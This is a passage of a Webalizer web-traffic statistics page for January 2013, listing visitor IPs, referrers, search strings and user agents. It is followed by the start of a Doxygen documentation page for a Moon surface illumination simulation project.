SIZE="-1">66.57.45.238</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>20</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1593</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">74.106.204.134</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1593</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">95.34.131.29</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>24</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.38%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.55%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1592</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">125.166.96.178</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.21%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>20</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.35%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1575</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.84%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">109.175.202.134</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>24</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>88</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.05%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>35</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.36%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1512</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.77%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.01%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">67.249.85.131</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.11%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.13%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1444</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">86.130.243.179</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.57%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.61%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1171</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.37%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">193.0.129.75</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>27</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.11%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.13%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1121</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.31%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">101.226.166.219</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>28</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>32</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.84%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>29</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.96%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1080</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.26%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">176.249.245.232</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>29</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.32%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.42%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>955</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.12%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">66.91.104.159</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>30</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.32%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.42%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>955</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.12%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">99.117.20.8</FONT></TD></TR> <TR><TH HEIGHT=4></TH></TR> </TABLE> <P> <A NAME="TOPREFS"></A> <TABLE WIDTH=510 BORDER=2 CELLSPACING=1 CELLPADDING=1> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=CENTER COLSPAN=4>Top 9 of 44 Total Referrers</TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=center><FONT SIZE="-1">#</FONT></TH> <TH BGCOLOR="#008040" ALIGN=center COLSPAN=2><FONT SIZE="-1">Hits</FONT></TH> <TH BGCOLOR="#00E0FF" ALIGN=center><FONT SIZE="-1">Referrer</FONT></TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>617</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">35.44%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">- (Direct Request)</FONT></TD></TR> <TR BGCOLOR="#D0D0E0"> <TD ALIGN=center><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>80</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.60%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><STRONG>Google</STRONG></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.57%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://image.baidu.com/i">http://image.baidu.com/i</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.29%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://www.finddotcom.com/">http://www.finddotcom.com/</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.11%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://torrentland.biz">http://torrentland.biz</A></FONT></TD></TR> <TR BGCOLOR="#D0D0E0"> <TD ALIGN=center><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><STRONG>Yahoo!</STRONG></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://stackoverflow.com/users/128824/haylwood">http://stackoverflow.com/users/128824/haylwood</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://www.bing.com/images/search">http://www.bing.com/images/search</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://www.go-profitclicking.com">http://www.go-profitclicking.com</A></FONT></TD></TR> <TR><TH HEIGHT=4></TH></TR> </TABLE> <P> <A NAME="TOPSEARCH"></A> <TABLE WIDTH=510 BORDER=2 CELLSPACING=1 CELLPADDING=1> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=CENTER COLSPAN=4>Top 5 of 5 Total Search Strings</TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=center><FONT SIZE="-1">#</FONT></TH> <TH BGCOLOR="#008040" ALIGN=center COLSPAN=2><FONT SIZE="-1">Hits</FONT></TH> <TH BGCOLOR="#00E0FF" ALIGN=center><FONT SIZE="-1">Search String</FONT></TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">50.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">academic poster</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">20.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">academic posters</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">10.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">contextual design flow model</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">10.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">hazydesigns.com</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">10.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">posters academic</FONT></TD></TR> <TR><TH HEIGHT=4></TH></TR> </TABLE> <P> <A NAME="TOPAGENTS"></A> <TABLE WIDTH=510 BORDER=2 CELLSPACING=1 CELLPADDING=1> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=CENTER COLSPAN=4>Top 30 of 28 Total User Agents</TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=center><FONT SIZE="-1">#</FONT></TH> <TH BGCOLOR="#008040" ALIGN=center COLSPAN=2><FONT SIZE="-1">Hits</FONT></TH> <TH BGCOLOR="#00E0FF" ALIGN=center><FONT SIZE="-1">User Agent</FONT></TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>887</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">50.95%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">Mozilla/5.0</FONT></TD></TR> <TR BGCOLOR="#D0D0E0"> <TD ALIGN=center><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>887</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">50.95%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><STRONG>Netscape 6 compatible</STRONG></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>233</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">13.38%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">MSIE 9.0</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>105</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.03%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">Baiduspider/2.0</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>86</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.94%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">MSIE 7.0</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>86</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.94%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">bingbot/2.0</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>70</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.02%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">Googlebot/2.1</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>67</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.85%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">MSIE 8.0</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>62</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.56%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">YandexBot/3.0</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.44%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>18</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.03%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">MJ12bot/v1.4</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.80%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 </FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.75%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">YandexImages/3.0</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.57%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">Baiduspider-image+(+http://www.baidu.com/search/spider.htm)</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.40%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">CompSpyBot/1.0</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>16</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.40%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">Googlebot-Image/1.0</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>17</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">Googlebot-Mobile</FONT></TD></TR> <TR BGCOLOR="#D0D0E0"> <TD ALIGN=center><FONT SIZE="-1"><B>18</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><STRONG>Opera</STRONG></FONT></TD></TR> <TR BGCOLOR="#D0D0E0"> <TD ALIGN=center><FONT SIZE="-1"><B>19</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.29%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><STRONG>Lynx</STRONG></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>20</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.29%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">MSIE 6.0</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.29%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">Opera/9.8</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.23%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">Googlebot/2.1 (+http://www.google.com/bot.html)</FONT></TD></TR> <TR BGCOLOR="#D0D0E0"> <TD ALIGN=center><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.11%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><STRONG>LWP</STRONG></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>24</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.11%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">MSIE 10.6</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.11%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">Python-urllib/2.7</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">BlackBerry9000/4.6.0.167 Profile/MIDP-2.0 Configuration/CLDC-</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>27</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">Google/2.5.1.13455 CFNetwork/609 Darwin/13.0.0</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>28</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">MSIE 5.0</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>29</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">MSIE9</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>30</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">Opera 12.1</FONT></TD></TR> <TR><TH HEIGHT=4></TH></TR> </TABLE> <P> <A NAME="TOPCTRYS"></A> <IMG SRC="ctry_usage_201301.png" ALT="Usage by Country for January 2013" HEIGHT=300 WIDTH=512><P> <TABLE WIDTH=510 BORDER=2 CELLSPACING=1 CELLPADDING=1> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=CENTER COLSPAN=8>Top 1 of 1 Total Countries</TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=center><FONT SIZE="-1">#</FONT></TH> <TH BGCOLOR="#008040" ALIGN=center COLSPAN=2><FONT SIZE="-1">Hits</FONT></TH> <TH BGCOLOR="#0080FF" ALIGN=center COLSPAN=2><FONT SIZE="-1">Files</FONT></TH> <TH BGCOLOR="#FF0000" ALIGN=center COLSPAN=2><FONT SIZE="-1">KBytes</FONT></TH> <TH BGCOLOR="#00E0FF" ALIGN=center><FONT SIZE="-1">Country</FONT></TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1741</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">100.00%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1486</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">100.20%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>85456</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">100.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">Unresolved/Unknown</FONT></TD></TR> <TR><TH HEIGHT=4></TH></TR> </TABLE> <P> </CENTER> <P> <HR> <TABLE WIDTH="100%" CELLPADDING=0 CELLSPACING=0 BORDER=0> <TR> <TD ALIGN=left VALIGN=top> <SMALL>Generated by <A HREF="http://www.mrunix.net/webalizer/"><STRONG>Webalizer Version 2.01</STRONG></A> </SMALL> </TD> </TR> </TABLE> <!-- Webalizer Version 2.01-10 (Mod: 16-Apr-2002) --> </BODY> </HTML>
doc/MSIS Code Documentation/_simulation_8cs.html
DigNative/MSISF
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <title>Moon Surface Illumination Simulation Framework: MoonIllumSim/src/main/Simulation.cs File Reference</title> <link href="tabs.css" rel="stylesheet" type="text/css"/> <link href="doxygen.css" rel="stylesheet" type="text/css" /> <link href="navtree.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="jquery.js"></script> <script type="text/javascript" src="resize.js"></script> <script type="text/javascript" src="navtree.js"></script> <script type="text/javascript"> $(document).ready(initResizable); </script> <link href="search/search.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="search/search.js"></script> <script type="text/javascript"> $(document).ready(function() { searchBox.OnSelectItem(0); }); </script> </head> <body> <div id="top"><!-- do not remove this div! --> <div id="titlearea"> <table cellspacing="0" cellpadding="0"> <tbody> <tr style="height: 56px;"> <td style="padding-left: 0.5em;"> <div id="projectname">Moon Surface Illumination Simulation Framework &#160;<span id="projectnumber">1.0</span> </div> <div id="projectbrief">A tool for simulating the Moon's surface illumination as seen from a virtual spacecraft.</div> </td> </tr> </tbody> </table> </div> <!-- Generated by Doxygen 1.7.5 --> <script type="text/javascript"> var searchBox = new SearchBox("searchBox", "search",false,'Search'); </script> <div id="navrow1" class="tabs"> <ul class="tablist"> <li><a href="index.html"><span>Main&#160;Page</span></a></li> <li><a href="namespaces.html"><span>Namespaces</span></a></li> <li><a href="annotated.html"><span>Classes</span></a></li> <li class="current"><a href="files.html"><span>Files</span></a></li> <li> <div id="MSearchBox" class="MSearchBoxInactive"> <span class="left"> <img id="MSearchSelect" src="search/mag_sel.png" onmouseover="return searchBox.OnSearchSelectShow()" onmouseout="return searchBox.OnSearchSelectHide()" alt=""/> <input type="text" id="MSearchField" value="Search" accesskey="S" onfocus="searchBox.OnSearchFieldFocus(true)" onblur="searchBox.OnSearchFieldFocus(false)" onkeyup="searchBox.OnSearchFieldChange(event)"/> </span><span class="right"> <a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a> </span> </div> </li> </ul> </div> <div id="navrow2" class="tabs2"> <ul class="tablist"> <li><a href="files.html"><span>File&#160;List</span></a></li> </ul> </div> </div> <div id="side-nav" class="ui-resizable side-nav-resizable"> <div id="nav-tree"> <div id="nav-tree-contents"> </div> </div> <div id="splitbar" style="-moz-user-select:none;" class="ui-resizable-handle"> </div> </div> <script type="text/javascript"> initNavTree('_simulation_8cs.html',''); </script> <div id="doc-content"> <div class="header"> <div 